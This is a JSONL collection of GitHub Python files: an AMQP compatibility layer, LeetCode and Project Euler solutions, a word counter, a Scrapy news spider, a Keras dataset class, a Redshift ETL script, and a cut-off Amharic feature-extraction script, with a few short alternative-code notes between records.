+{"seq_id":"40857503238","text":"\"\"\"Python 2/3 Compatibility layer.\"\"\"\n\nimport sys\n\ntry:\n import ssl\nexcept ImportError:\n ssl = None\n\ntry:\n import simplejson as json # noqa\nexcept ImportError:\n import json # noqa\n\ntry:\n import urlparse # noqa\nexcept ImportError:\n import urllib.parse as urlparse # noqa\n\ntry:\n from urllib import quote # noqa\nexcept ImportError:\n from urllib.parse import quote # noqa\n\nPYTHON3 = sys.version_info >= (3, 0, 0)\n\nif PYTHON3:\n RANGE = range\nelse:\n RANGE = xrange\n\nSSL_CERT_MAP = {}\nSSL_VERSIONS = {}\nSSL_OPTIONS = [\n 'keyfile',\n 'certfile',\n 'cert_reqs',\n 'ssl_version',\n 'ca_certs'\n]\n\n\ndef get_default_ssl_version():\n \"\"\"Get the highest support TLS version, if none is available, return None.\n\n :rtype: bool|None\n \"\"\"\n if hasattr(ssl, 'PROTOCOL_TLSv1_2'):\n return ssl.PROTOCOL_TLSv1_2\n elif hasattr(ssl, 'PROTOCOL_TLSv1_1'):\n return ssl.PROTOCOL_TLSv1_1\n elif hasattr(ssl, 'PROTOCOL_TLSv1'):\n return ssl.PROTOCOL_TLSv1\n return None\n\n\nDEFAULT_SSL_VERSION = get_default_ssl_version()\nSSL_SUPPORTED = DEFAULT_SSL_VERSION is not None\nif SSL_SUPPORTED:\n if hasattr(ssl, 'PROTOCOL_TLSv1_2'):\n SSL_VERSIONS['protocol_tlsv1_2'] = ssl.PROTOCOL_TLSv1_2\n if hasattr(ssl, 'PROTOCOL_TLSv1_1'):\n SSL_VERSIONS['protocol_tlsv1_1'] = ssl.PROTOCOL_TLSv1_1\n SSL_VERSIONS['protocol_tlsv1'] = ssl.PROTOCOL_TLSv1\n\n SSL_CERT_MAP = {\n 'cert_none': ssl.CERT_NONE,\n 'cert_optional': ssl.CERT_OPTIONAL,\n 'cert_required': ssl.CERT_REQUIRED\n }\n\n\ndef is_string(obj):\n \"\"\"Is this a string.\n\n :param object obj:\n :rtype: bool\n \"\"\"\n if PYTHON3:\n str_type = (bytes, str)\n else:\n str_type = (bytes, str, unicode)\n return isinstance(obj, str_type)\n\n\ndef is_integer(obj):\n \"\"\"Is this an integer.\n\n :param object obj:\n :return:\n \"\"\"\n if PYTHON3:\n return isinstance(obj, int)\n return isinstance(obj, (int, long))\n\n\ndef is_unicode(obj):\n \"\"\"Is this a unicode string.\n\n This always returns False if running Python 3.x.\n\n :param object obj:\n :rtype: bool\n \"\"\"\n if PYTHON3:\n return False\n return isinstance(obj, unicode)\n\n\ndef try_utf8_decode(value):\n \"\"\"Try to decode an object.\n\n :param value:\n :return:\n \"\"\"\n if not value or not is_string(value):\n return value\n elif PYTHON3 and not isinstance(value, bytes):\n return value\n elif not PYTHON3 and not isinstance(value, unicode):\n return value\n\n try:\n return value.decode('utf-8')\n except UnicodeDecodeError:\n pass\n\n return value\n\n\ndef patch_uri(uri):\n \"\"\"If a custom uri schema is used with python 2.6 (e.g. amqps),\n it will ignore some of the parsing logic.\n\n As a work-around for this we change the amqp/amqps schema\n internally to use http/https.\n\n :param str uri: AMQP Connection string\n :rtype: str\n \"\"\"\n index = uri.find(':')\n if uri[:index] == 'amqps':\n uri = uri.replace('amqps', 'https', 1)\n elif uri[:index] == 'amqp':\n uri = uri.replace('amqp', 'http', 1)\n return uri\n","repo_name":"fake-name/ReadableWebProxy","sub_path":"amqpstorm/compatibility.py","file_name":"compatibility.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"91"}
+{"seq_id":"1347929091","text":"# Input: s = \"codeleet\", indices = [4,5,6,7,0,2,1,3]\n# Output: \"leetcode\"\n# Explanation: As shown, \"codeleet\" becomes \"leetcode\" after shuffling.\n# Example 2:\n\n# Input: s = \"abc\", indices = [0,1,2]\n# Output: \"abc\"\n# Explanation: After shuffling, each character remains in its position.\n\n\ns = \"codeleet\"\n\nindices = [4, 5, 6, 7, 0, 2, 1, 3]\n\n\ndef restoreString(s: str, indices) -> str:\n n = len(s)\n l = [0]*n\n for i in range(n):\n l[indices[i]] = s[i]\n s = ''.join(l)\n return s\n\n\nprint(restoreString(s, indices))\n","repo_name":"kanstat/LeetCode-Solutions","sub_path":"leet1528.py","file_name":"leet1528.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
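The same restore can be written without the scratch list by sorting the characters by their target index (O(n log n) instead of O(n), but a compact alternative):

def restoreString_sorted(s, indices):
    # Pair each character with its destination index, sort by that index, rejoin.
    return ''.join(ch for _, ch in sorted(zip(indices, s)))

print(restoreString_sorted("codeleet", [4, 5, 6, 7, 0, 2, 1, 3]))  # leetcode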
+{"seq_id":"7685025710","text":"# Definition for singly-linked list.\nclass ListNode(object):\n    def __init__(self, x):\n        self.val = x\n        self.next = None\n\nclass Solution(object):\n    def reverseKGroup(self, head, k):\n        \"\"\"\n        :type head: ListNode\n        :type k: int\n        :rtype: ListNode\n        \"\"\"\n        if head is None:\n            return None\n\n        dumb = ListNode(0)\n        l = dumb\n        cur = head\n        r = cur.next\n        l.next = cur\n\n        while True:\n            # First check that the k nodes starting at cur all exist; if not, we are done.\n            flag_node = cur\n            for _ in range(k):\n                if flag_node is None:\n                    return dumb.next\n                flag_node = flag_node.next\n\n            # Reverse this group of k nodes, which takes k - 1 pointer flips.\n            new_l = cur\n            for _ in range(k - 1):\n                tmp = r.next\n                r.next = cur\n                cur = r\n                r = tmp\n\n            # Reconnect the reversed group and advance the pointers to the next group.\n            l.next = cur\n            l = new_l\n            cur = r\n            l.next = cur\n            if cur:\n                r = cur.next\n\n\nif __name__ == '__main__':\n    head = ListNode(1)\n    head.next = ListNode(2)\n    head.next.next = ListNode(3)\n    head.next.next.next = ListNode(4)\n\n    result = Solution().reverseKGroup(head, 2)\n\n    while result is not None:\n        print(result.val)\n        result = result.next\n\n\n","repo_name":"blackwings001/LeetCode","sub_path":"1-50/_25_reverse_k_group.py","file_name":"_25_reverse_k_group.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"24998376809","text":"from typing import List, Dict\nimport re\n\n\ndef get_input_from_file_as_list_of_lines(filename: str) -> List[str]:\n l = []\n with open(filename) as f:\n for line in f:\n l.append(line)\n return l\n\n\ndef get_input_from_file_as_single_string(filename: str) -> str:\n s = \"\"\n with open(filename) as f:\n for line in f:\n s += line\n return s\n\n\ndef word_count_dictionary(text: str) -> Dict[str, int]:\n words = text.split()\n d = {}\n for w in words:\n if w not in d:\n d[w] = 1\n else:\n d[w] += 1\n # https://stackoverflow.com/questions/613183/how-do-i-sort-a-dictionary-by-value\n d = dict(sorted(d.items(), key=lambda item: item[1], reverse=True))\n return d\n\n\ndef main():\n f1 = \"lorem_ipsum.txt\"\n f2 = \"regexr_example.txt\"\n s = get_input_from_file_as_single_string(f1)\n t = get_input_from_file_as_single_string(f2)\n\n # Print the word counts sorted by frequency\n print(word_count_dictionary(s))\n print()\n print(word_count_dictionary(t))\n print()\n\n # Example of built-in .replace()\n print(s.replace('the', 'THEEEEE'))\n\n # Example of built-in re.sub()\n pattern = \"([A-Z])\\w+\"\n replace = \"CAPITAL WORD\"\n t = re.sub(pattern, replace, t)\n print(t)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bliutwo/notable-health-backend","sub_path":"py_template.py","file_name":"py_template.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
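collections.Counter produces the same frequency dictionary as word_count_dictionary in a single step; most_common() already returns the pairs sorted by count, descending:

from collections import Counter

def word_count_counter(text):
    # Counter tallies the words; most_common() orders them by frequency.
    return dict(Counter(text.split()).most_common())

print(word_count_counter("the cat and the hat"))
# {'the': 2, 'cat': 1, 'and': 1, 'hat': 1}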
+{"seq_id":"9478273943","text":"# -*- coding: utf8 -*-\nfrom scrapy.http import JsonRequest, Request\nfrom scrapy.selector import Selector\nfrom bs4 import BeautifulSoup\n\nfrom ssg_new_crawler.spiders.tintucSSG import SSGSpider\nfrom ssg_new_crawler.utils import download_img\n\n\nclass Techz(SSGSpider):\n name = \"Techz\"\n url = 'https://www.techz.vn/category-more-dien-thoai-{page}'\n page = 1\n limit = 30\n\n def create_request(self, item, data, *a, **kw):\n return Request(self.url.format(page=self.page), callback=self.parse, errback=self.fail, meta={'item': item})\n\n def parse(self, response):\n item = response.meta.get('item')\n\n # extract catlink and image\n cat_link = [f'https://www.techz.vn{x}' for x in response.css(\".media .media-body > a::attr(href)\").extract()]\n imgs = response.css('.media img::attr(src)').extract()\n\n for url, img in list(zip(cat_link, imgs)):\n self.crawler.stats.inc_value(f'{self.name}/total')\n detail_item = item.copy()\n detail_item.update(\n new_source_url=url,\n new_image=img # download_img(img)\n )\n # check item exist in database\n if not self.model.exist(detail_item):\n yield Request(url, callback=self.parse_detail, errback=self.fail, meta={'item': detail_item})\n\n # nextpage\n self.page += 1\n yield Request(self.url.format(page=self.page), callback=self.parse, errback=self.fail, meta={'item': item})\n\n def parse_detail(self, response):\n item = response.meta.get('item')\n\n # extract title, description, content\n title = response.css('h1::text').extract_first()\n description = response.css('h2::text').extract_first()\n\n soup = BeautifulSoup(response.text, 'html.parser')\n content = soup.select_one('.content-detail-right')\n\n # remove h2 and tag contain .inner-article\n remove_tags = content.select('h2') + content.select('.inner-article')\n for tag in remove_tags:\n tag.decompose()\n # replace img\n for tag in content.select('img'):\n # soup.new_tag() create new image tag\n new_tag = soup.new_tag('img', src=tag['src']) # soup.new_tag('img', src=download_img(tag['data-original']))\n # replaces tag with new_tag\n tag.replace_with(new_tag)\n\n # update item\n item.update(\n new_title=title,\n new_description=description,\n new_content=str(content)\n )\n # yield item\n import pdb; pdb.set_trace()\n self.logger.info(f\"url: {response.url} done, \"\\\n f\"category: {self.crawler.stats.get_value(f'{self.name}/total')}, \"\\\n f\"saved: {self.crawler.stats.get_value(f'{self.name}/saved')}\")\n","repo_name":"anhlt59/crawler","sub_path":"ssg_new_crawler/spiders/tintucSSG/Techz.py","file_name":"Techz.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7724272978","text":"\"\"\"\nThis module provides classes for datasets handling with the following \nfeatures:\n - Automatically returns a datasets in the format (data, labels).\n - Supports data splitting in train, test and validation sets.\n - Supports data shuffling.\n - Automatically data enconding and categorical transformation.\n - Data balancing.\nUse this module on keras projects.\n\"\"\"\n\nfrom inspect import currentframe, getframeinfo\nimport numpy as np\nimport collections\nimport sklearn\nimport keras\nimport random\nfrom common.util import logm\n\n\ndef balance_data(x, y):\n \"\"\"\n Balance data to be representative.\n\n Note: When balancing the data, the number os data and labels tends to\n decrease because the extra instances of some classes will be removed. \n \n Args:\n x (list like): Data or paths.\n y (list like): Labels/classes. \n\n Returns:\n tuple (np.ndarray, np.ndarray): x, y balanced\n \"\"\"\n dataset = list(zip(x, y))\n unique, counts = np.unique(y, return_counts=True)\n max_n_instances = min(counts)\n paths_per_label = dict()\n for label in unique:\n paths_per_label[label] = list(filter(lambda d: d[1] == label, dataset))\n x = []\n y = []\n for label in paths_per_label:\n for inst, lbl in paths_per_label[label][:max_n_instances]:\n x.append(inst)\n y.append(lbl)\n\n return np.asarray(x), np.asarray(y)\n\n\nclass Dataset:\n \"\"\"\n Dataset class.\n \n Features:\n - Automatically returns a datasets in the format (data, labels).\n - Supports data splitting in train, test and validation sets.\n - Supports data shuffling.\n - Automatically data enconding and categorical transformation.\n \"\"\"\n def __init__(self,\n data,\n labels,\n name=None,\n encode_labels=True,\n to_categorical=True,\n shuffle=True,\n num_classes=None,\n val_split=0.0,\n test_split=0.0):\n \"\"\"\n Creates a new dataset with the provided data and labels.\n \n Args:\n data (list like): a list like with data or paths\n labels (list like): a list like with the corresponding labels \n name (str, optional): The name of this dataset. Defaults to None.\n encode_labels (bool, optional): Choose to encode labels\n automatically. Defaults to True.\n to_categorical (bool, optional): Choose to convert the labels to\n categorical automatically. Defaults to True.\n shuffle (bool, optional): Choose to shuffle the dataset.\n Defaults to True.\n num_classes (int, optional): Number of classes of this dataset.\n Affects the categorical and encoded labels. If None, it will\n be considered the number of different classes in labels.\n Defaults to None.\n val_split (float, optional): Validation split of this dataset.\n Must be in the range of [0.0, 1.0]. Defaults to 0.0.\n test_split (float, optional): Test split of this dataset.\n Must be in the range of [0.0, 1.0]. 
Defaults to 0.0.\n \"\"\"\n logm(f'Creating dataset: total of {len(data)} samples',\n cur_frame=currentframe(), mtype='I')\n if len(data) != len(labels):\n logm(f'Size of data ({len(data)}) and labels ({len(labels)}) '\n 'are different', cur_frame=currentframe(), mtype='W')\n if not shuffle and (val_split > 0.0 or test_split > 0.0):\n logm(f'Split is set but no shuffling will be performed',\n cur_frame=currentframe(), mtype='W')\n if name:\n self._name = name\n self._data = data\n self._labels = labels\n self._shuffle = shuffle\n self._val_split = val_split\n self._test_split = test_split\n self._le = None\n if num_classes is None:\n self._num_classes = np.unique(labels).shape[0]\n else:\n self._num_classes = num_classes\n\n self._data_labels = list(zip(self._data, self._labels))\n if self._shuffle:\n random.shuffle(self._data_labels)\n\n all_data = self._data\n all_labels = self._labels\n train_data = list()\n train_labels = list()\n val_data = list()\n val_labels = list()\n test_data = list()\n test_labels = list()\n\n if self._test_split > 0.0 or self._val_split > 0.0:\n data_per_label = collections.defaultdict(lambda: [])\n for p, l in zip(self._data, self._labels):\n data_per_label[l].append(p)\n\n splits = [0, 1 - (val_split + test_split), 1 - test_split]\n\n for label in data_per_label:\n l_train_data = (data_per_label[label][splits[0]:int(splits[1] *\n len(data_per_label[label]))])\n train_data += l_train_data\n train_labels += [label for _ in range(len(l_train_data))]\n if self._val_split > 0.0:\n l_val_data = (data_per_label[label][int(splits[1]*len(\n data_per_label[label])):int(splits[2]*len(\n data_per_label[label]))])\n val_data += l_val_data\n val_labels += [label for _ in range(len(l_val_data))]\n if self._test_split > 0.0:\n l_test_data = (data_per_label[label][int(splits[2]*len(\n data_per_label[label])):len(\n data_per_label[label])])\n test_data += l_test_data\n test_labels += [label for _ in range(len(l_test_data))]\n self._all_data = np.asarray(all_data)\n self._all_labels = np.asarray(all_labels)\n self._train_data = np.asarray(train_data)\n self._train_labels = np.asarray(train_labels)\n self._val_data = np.asarray(val_data)\n self._val_labels = np.asarray(val_labels)\n self._test_data = np.asarray(test_data)\n self._test_labels = np.asarray(test_labels)\n\n if encode_labels:\n self._le = sklearn.preprocessing.LabelEncoder()\n self._le.fit(np.unique(labels))\n self._all_labels = self._le.transform(self._all_labels)\n self._train_labels = self._le.transform(self._train_labels)\n self._test_labels = self._le.transform(self._test_labels)\n self._val_labels = self._le.transform(self._val_labels)\n if to_categorical:\n self._all_labels = keras.utils.to_categorical(\n self._all_labels, num_classes=self._num_classes)\n self._train_labels = keras.utils.to_categorical(\n self._train_labels, num_classes=self._num_classes)\n self._test_labels = keras.utils.to_categorical(\n self._test_labels, num_classes=self._num_classes)\n self._val_labels = keras.utils.to_categorical(\n self._val_labels, num_classes=self._num_classes)\n\n def __call__(self) -> (np.ndarray, np.ndarray):\n \"\"\"\n The calling of a object of this class will return all the dataset,\n including all sets (validation, test and train sets).\n The data and labels returned are transformed by the transformations\n provided in the init method, that is, encoding and shuffling for\n example.\n \n Returns:\n tuple: (data, labels)\n \"\"\"\n return self._all_data, self._all_labels\n\n @property\n def num_classes(self) -> 
int:\n \"\"\"\n Get the number of classes of this dataset.\n \n Returns:\n int: number of classes\n \"\"\"\n return self._num_classes\n\n @property\n def train(self) -> (np.ndarray, np.ndarray):\n \"\"\"\n Returns the train data.\n \n Returns:\n (np.ndarray, np.ndarray): (data, labels)\n \"\"\"\n return self._train_data, self._train_labels\n\n @property\n def test(self) -> (np.ndarray, np.ndarray):\n \"\"\"\n Returns the test data. It can be None if no test split was provided\n in the init method.\n \n Returns:\n (np.ndarray, np.ndarray): (data, labels)\n \"\"\"\n return self._test_data, self._test_labels\n\n @property\n def validation(self) -> (np.ndarray, np.ndarray):\n \"\"\"\n Returns the validation data. It can be None if no test split was\n provided in the init method.\n \n Returns:\n (np.ndarray, np.ndarray): (data, labels)\n \"\"\"\n return self._val_data, self._val_labels\n\n @property\n def label_encoder(self) -> sklearn.preprocessing.LabelEncoder:\n \"\"\"\n Get the label encoder object for labels transformations.\n This is useful to get the original labels.\n \n Returns:\n sklearn.preprocessing.LabelEncoder: The label encoder object\n \"\"\"\n return self._le\n\n def __str__(self):\n \"\"\"\n Returns the name of the dataset or call the super class method.\n \"\"\"\n if self._name:\n return self._name\n return super().__str__()\n\n def __len__(self):\n \"\"\"\n Returns the size of all data.\n \"\"\"\n return len(self._all_data)\n\nclass TestDataset(Dataset):\n \"\"\"\n A more specific type of Dataset used for a specific test set.\"\n\n Calling the test() method of this object will return all data as the test\n set. It is not possible to split the data.\n \"\"\"\n def __init__(self,\n data,\n labels,\n name=None,\n num_classes=None,\n encode_labels=True,\n to_categorical=True,\n shuffle=True):\n \"\"\"\n Creates a new dataset with the provided data and labels.\n \n Args:\n data (list like): a list like with data or paths\n labels (list like): a list like with the corresponding labels \n name (str, optional): The name of this dataset. Defaults to None.\n encode_labels (bool, optional): Choose to encode labels\n automatically. Defaults to True.\n to_categorical (bool, optional): Choose to convert the labels to\n categorical automatically. Defaults to True.\n shuffle (bool, optional): Choose to shuffle the dataset.\n Defaults to True.\n num_classes (int, optional): Number of classes of this dataset.\n Affects the categorical and encoded labels. If None, it will\n be considered the number of different classes in labels.\n Defaults to None.\n val_split (float, optional): Validation split of this dataset.\n Must be in the range of [0.0, 1.0]. Defaults to 0.0.\n test_split (float, optional): Test split of this dataset.\n Must be in the range of [0.0, 1.0]. Defaults to 0.0.\n \"\"\"\n Dataset.__init__(self,\n data=data,\n labels=labels,\n name=name,\n num_classes=num_classes,\n encode_labels=encode_labels,\n to_categorical=to_categorical,\n shuffle=shuffle)\n\n @property\n def test(self) -> (np.ndarray, np.ndarray):\n \"\"\"\n Returns the test data. \n \n Returns:\n (np.ndarray, np.ndarray): (data, labels)\n \"\"\"\n return super().__call__()\n\n def __str__(self):\n return super().__str__() + '[TestDataset]'","repo_name":"lucasgris/lid-latinoware","sub_path":"common/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":11830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
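A minimal usage sketch for the Dataset class above; the file names and labels are invented for illustration, and it assumes the module's keras/sklearn imports resolve:

# Hypothetical toy data: six samples, two classes, half held out for testing
paths = ['a.png', 'b.png', 'c.png', 'd.png', 'e.png', 'f.png']
labels = ['cat', 'dog', 'cat', 'dog', 'cat', 'dog']
ds = Dataset(paths, labels, name='toy', test_split=0.5)
x_train, y_train = ds.train   # labels come back one-hot encoded by default
x_test, y_test = ds.test
print(len(ds), ds.num_classes)   # 6 2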
+{"seq_id":"6685268548","text":"import configparser\nimport psycopg2\nimport re\nimport pandas as pd\nfrom sql_queries import copy_table_queries, insert_table_queries\n\n\ndef load_staging_tables(cur, conn):\n \"\"\"\n Function to load the ST (Stage) tables\n \"\"\"\n for query in copy_table_queries:\n table_name = re.findall(r\"COPY\\ (.+?)\\ from\", query)\n try:\n cur.execute(query)\n conn.commit()\n print(\"'{}' COPY Successful...!!!\".format(table_name[0]))\n except psycopg2.Error as e:\n print(\"Error----->\", e)\n\n\ndef update_users_table(cur, conn, user_ids):\n \"\"\"\n Function to delete the duplicate records in the USERS table\n and insert the latest values of those duplicate user_ids\n (i.e., 'level' update from 'free' to 'paid' )\n \"\"\"\n max_ts = \"\"\" SELECT max_time FROM (SELECT MAX(ts) as max_time, \\\n userId FROM ST_Events WHERE userId IN {} \\\n GROUP BY userId ORDER BY userId)\"\"\".format(\n user_ids\n )\n\n updated_level = \"\"\" SELECT userId,\n firstName,\n lastName,\n gender, level FROM ST_EVENTS \\\n WHERE ts IN ({}) AND userId IN {}\"\"\".format(\n max_ts, user_ids\n )\n\n cur.execute(updated_level)\n recent_level = cur.fetchall()\n\n # Deleting all the user_ids which has duplicates\n print(\"... Deleting duplicates .....\")\n delete_query = \"DELETE FROM users WHERE user_id IN {}\".format(user_ids)\n print(delete_query)\n cur.execute(delete_query)\n conn.commit()\n\n # Inserting the deleted user_ids with the Most Recent data\n users_insert_query = \"INSERT INTO users (user_id, first_name,last_name,gender, level) VALUES (%s, %s,%s,%s, %s)\"\n for row in recent_level:\n cur.execute(users_insert_query, row)\n conn.commit()\n\n\ndef insert_tables(cur, conn):\n \"\"\"\n Function to load the sparkify tables\n \"\"\"\n for query in insert_table_queries:\n table_name = re.findall(r\"INSERT INTO\\ (.+?)\\ \", query)\n try:\n cur.execute(query)\n conn.commit()\n print(\"'{}' Insert Successful...!!!\".format(table_name[0]))\n except psycopg2.Error as e:\n print(e)\n\n query = \"\"\"SELECT user_id FROM (SELECT user_id,count(*) c FROM users GROUP BY user_id ) WHERE c>1\"\"\"\n u_id = pd.read_sql_query(query, conn)\n user_ids = tuple(u_id[\"user_id\"])\n if user_ids:\n print(\"Duplicate records for userIds :\", user_ids)\n update_users_table(cur, conn, user_ids)\n print(\"Inserted with the latest information for the updated users\")\n\n\ndef main():\n \"\"\"\n - Establishes connection with the sparkify database from configuration file and gets cursor to it. \n - Loads the Staging tables\n - Loads other schema tables\n - Finally, closes the connection.\n \"\"\"\n config = configparser.ConfigParser()\n config.read(\"dwh.cfg\")\n\n conn = psycopg2.connect(\n \"host={} dbname={} user={} password={} port={}\".format(\n *config[\"CLUSTER\"].values()\n )\n )\n cur = conn.cursor()\n\n load_staging_tables(cur, conn)\n insert_tables(cur, conn)\n\n conn.close()\n print(\"*************** ETL process completed ***************\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"nandinip92/Data-Engineering-Projects","sub_path":"P3 - Cloud Datawarehousing with AWS/etl.py","file_name":"etl.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"21940137497","text":"def erato_primes(n):\n divisors = [0 for _ in range(n)]\n divisors[0] = 1\n divisors[1] = 1\n divisors[2] = 0\n primes = []\n for i in range(2, n):\n for j in range(i * 2, n, i):\n divisors[j] = 1\n if divisors[i] == 0:\n primes.append(i)\n return primes\n\nprimes = erato_primes(1000)\n\ns_value = 71\ntarget = s_value\nways = [0] * (target+1)\nways[0] = 1\n\nfor i in range(0, len(primes)):\n for j in range(primes[i], target+1):\n ways[j] += ways[j-primes[i]]\nprint(ways[-1])","repo_name":"A-Dabek/Euler_reactivation","sub_path":"p70s/p77.py","file_name":"p77.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"34019030881","text":"# coding:utf-8\n\nimport codecs\nimport re\n\n# function: open different files\ndef opening(file_name):\n\tf = codecs.open(file_name, 'r', 'utf-8')\n\tarray = [line.strip() for line in f]\n\tf.close()\n\treturn array\n\n# fucnction: opend dictionary\ndef open_dict():\n\tdict = codecs.open('.\\\\used_files\\\\cleaned_dictionary.txt', 'r', 'utf-8')\n\tdictionary = {}\n\tfor line in dict:\n\t\tsplit_line = line.split('\\t')\n\t\tif len(split_line) == 2:\n\t\t\tdictionary[split_line[1]] = split_line[0]\n\t\telse:\n\t\t\ti = 1\n\t\t\twhile i != 8:\n\t\t\t\ttry:\n\t\t\t\t\tdictionary[split_line[i]] = split_line[0]\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\ti += 1\n\tdict.close()\n\treturn dictionary\n\ndef return_sent(text):\n\ttext = re.sub(u'\\t+', '', text)\n\ttext = re.sub(u'፡፡', u'።', text)\n\ttext = re.sub(u'([.!?።፨፠]|\\r\\n)', u'\\\\1 %%%%', text)\n\tsents = re.split(u'%%%%', text)\n\tfor sent in sents:\n\t\tsent = re.sub(u'[\\r\\n]', '', sent)\n\t\tsent = re.sub(u'(^[.፡ ]+|[.፡ ]+$)', '', sent)\n\t\tif sent == '':\n\t\t\tcontinue\n\t\tsent = '' + sent + ''\n\t\tyield sent\n\n# function: feature extraction\ndef feat_extract(name, text):\n\t# crate file for writing\n\tf_name = name.replace('.txt', '')\n\tfeat_name = u'features_files\\\\' + 'features_' + f_name + '.csv'\n\tw = codecs.open(feat_name, 'w', 'utf-8')\n\n\t# open needed files\n\tdictionary = open_dict()\n\tconsonants = opening('.\\\\used_files\\\\consonants.txt')\n\tvowel_o = opening('.\\\\used_files\\\\vowel_o.txt')\n\tvowel_u = opening('.\\\\used_files\\\\vowel_u.txt')\n\tvowel_e = opening('.\\\\used_files\\\\vowel_e.txt')\n\tvowel_i = opening('.\\\\used_files\\\\vowel_i.txt')\n\tvowel_a = opening('.\\\\used_files\\\\vowel_a.txt')\n\tvowel_ae = opening('.\\\\used_files\\\\vowel_ae.txt')\n\tpronouns = opening('.\\\\used_files\\\\pronouns.txt')\n\tnumerals = opening('.\\\\used_files\\\\numerals.txt')\n\tverbs = opening('.\\\\used_files\\\\verbs.txt')\n\tconjunctions = opening('.\\\\used_files\\\\conjunctions.txt')\n\tadpositions = opening('.\\\\used_files\\\\adpositions.txt')\n\tparticles = opening('.\\\\used_files\\\\particles.txt')\n\tdemonstratives = opening('.\\\\used_files\\\\demonstratives.txt')\n\tquest_pronouns = opening('.\\\\used_files\\\\quest_pronouns.txt')\n\tpersonal_pronouns = opening('.\\\\used_files\\\\pers_pronouns.txt')\n\n\tfreq_dictionary ={}\n\n\t# function: create frequency dictionary\n\tdef freq_dict(word, freq_dictionary = freq_dictionary):\n\t\tif word in freq_dictionary:\n\t\t\tfreq_dictionary[word] += 1\n\t\telse:\n\t\t\tfreq_dictionary[word] = 1\n\n\twords_out = []\n\tthreshold = 0\n\n\t# get features and write in the file\n\twhole_words = 0\n\tnumb_sent = 1\n\tfor sent in return_sent(text):\n\t\twords = re.split(u'[፡ ]+', sent)\n\t\tnumb_word = 1\n\t\tfor actual_word in words:\n\t\t\t# outcomment when clastering\n\t\t\tif threshold == 11500:\n\t\t\t\tbreak\n\t\t\t# add or word in freq_dictionary when clastering\n\t\t\tif actual_word == '':\n\t\t\t\tcontinue\n\t\t\tif actual_word[-1] in u'፣፤፥':\n\t\t\t\tpunct = 1\n\t\t\telse:\n\t\t\t\tpunct = 0\n\n\t\t\tif ';' in actual_word:\n\t\t\t\tactual_word = actual_word.replace(';', '<&***&>')\n\n\t\t\tword = re.sub(u'<.+?>', '', actual_word )\n\t\t\tword = re.sub(u'[-_:;\\'\\\"\\#*«»)(\\]\\[^$@}{‘’><.,?!%፠፡፣፤፥፧።፨፦]', '', word)\n\t\t\tif word == '':\n\t\t\t\tcontinue\n\n\t\t\tactual_word = actual_word + '' + ''\n\n\t\t\t'''\n\t\t\tif word in verbs:\n\t\t\t\tcontinue\n\t\t\tif word in conjunctions:\n\t\t\t\tcontinue\n\t\t\tif word 
in pronouns:\n\t\t\t\tcontinue\n\t\t\tif word in adpositions:\n\t\t\t\tcontinue\n\t\t\tif re.search('[0-9]', word):\n\t\t\t\tcontinue\n\t\t\tif word in particles:\n\t\t\t\tcontinue\n\t\t\tif word in numerals:\n\t\t\t\tcontinue\n\n\t\t\tif len(word) >= 3 and (word[:2] == u'የዚ' or word[:2] == u'በዚ' or word[:2] == u'ከዚ'):\n\t\t\t\ttry_word = word[2:]\n\t\t\t\tif try_word in demonstratives:\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\ttry_word = u'ይ' + word[2:]\n\t\t\t\t\tif try_word in demonstratives:\n\t\t\t\t\t\tcontinue\n\t\t\tif len(word) >= 2 and (word[0] == u'የ' or word[0] == u'ለ' or word[0] == u'በ'):\n\t\t\t\ttry_word = word[1:]\n\t\t\t\tif try_word in personal_pronouns:\n\t\t\t\t\tcontinue\n\t\t\t\telif len(word) >= 3 and word[:2] == u'ስለ':\n\t\t\t\t\ttry_word = word[2:]\n\t\t\t\t\tif try_word in personal_pronouns:\n\t\t\t\t\t\tcontinue\n\t\t\tif len(word) >= 2 and (word[-1] == u'ኛ' or word[-1] == u'ም'):\n\t\t\t\tchange = [u'ህ', u'ቶ', u'ና', u'ያ', u'ባ', u'ሳ', u'ራ', u'ር', u'ኝ', u'ት', u'ድ']\n\t\t\t\tfor i in change:\n\t\t\t\t\ttry_word = word[:-2] + i\n\t\t\t\t\tif try_word in numerals:\n\t\t\t\t\t\tcontinue\n\t\t\tif len(word) >= 3 and ((word[-2] == u'ኛ' and (word[-1] == u'ው' or word[-1] == u'ዋ' or word[-1] in vowel_u)) or (word[-1] == u'ም' and (word[-2] == u'ው' or word[-2] == u'ዋ' or word[-2] in vowel_u))):\n\t\t\t\ttry_word = word[:-2]\n\t\t\t\tif try_word in quest_pronouns:\n\t\t\t\t\tcontinue\n\t\t\t'''\n\n\n\n\t\t\tw.write(actual_word + ';')\n\t\t\tfreq_dict(word)\n\t\t\twords_out.append(word)\n\n\t\t\t# check punct\n\t\t\tif punct == 1:\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check word length\n\t\t\tw.write(str(len(word)) + ';')\n\n\t\t\t# check first word\n\t\t\tif numb_word == 1:\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\t# check last word\n\t\t\tif numb_word == len(words):\n\t\t\t\tw.write('1;')\n\t\t\telse:\n\t\t\t\tw.write('0;')\n\n\t\t\tdef check_in(group, word = word, w = w):\n\t\t\t\tif word in 